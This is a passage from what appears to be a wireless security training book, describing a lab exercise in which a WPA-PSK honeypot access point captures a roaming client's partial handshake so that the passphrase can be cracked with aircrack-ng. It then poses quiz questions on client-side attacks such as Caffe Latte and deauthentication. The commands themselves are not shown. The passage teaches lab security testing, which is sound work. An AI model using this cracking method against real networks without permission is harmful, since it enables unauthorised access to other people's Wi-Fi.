We will set up a WPA-PSK Honeypot with the ESSID Wireless Lab. The -z 2 option creates a WPA-PSK access point, which uses TKIP:
Let's also start airodump-ng to capture packets from this network:
Now when our roaming client connects to this access point, it starts the handshake but fails to complete it after Message 2, as discussed previously; however, the data required to crack the handshake has been captured.
We run the airodump-ng capture file through aircrack-ng with the same dictionary file as before; eventually, the passphrase is cracked as before.
What just happened?
We were able to crack the WPA key with just the client. This was possible because, even with just the first two packets, we have all the information required to launch a dictionary attack on the handshake.
Have a go hero – AP-less WPA cracking
We recommend setting different WEP keys on the client and trying this exercise a couple of times to gain confidence. You may notice many times that you have to reconnect the client to get it to work.
Pop quiz – attacking the client
Q1. What encryption key can the Caffe Latte attack recover?
None
WEP
WPA
WPA2
Q2. What would a Honeypot access point typically use?
No Encryption, Open Authentication
No Encryption, Shared Authentication
WEP Encryption, Open Authentication
None of the above
Q3. Which one of the following is a DoS Attack?
Mis-Association attacks
Deauthentication attacks
Disassociation attacks
Both 2 and 3
Q4. What does the Caffe Latte attack require?
That the wireless client be in radio range of the access point
That the client contains a cached and stored WEP key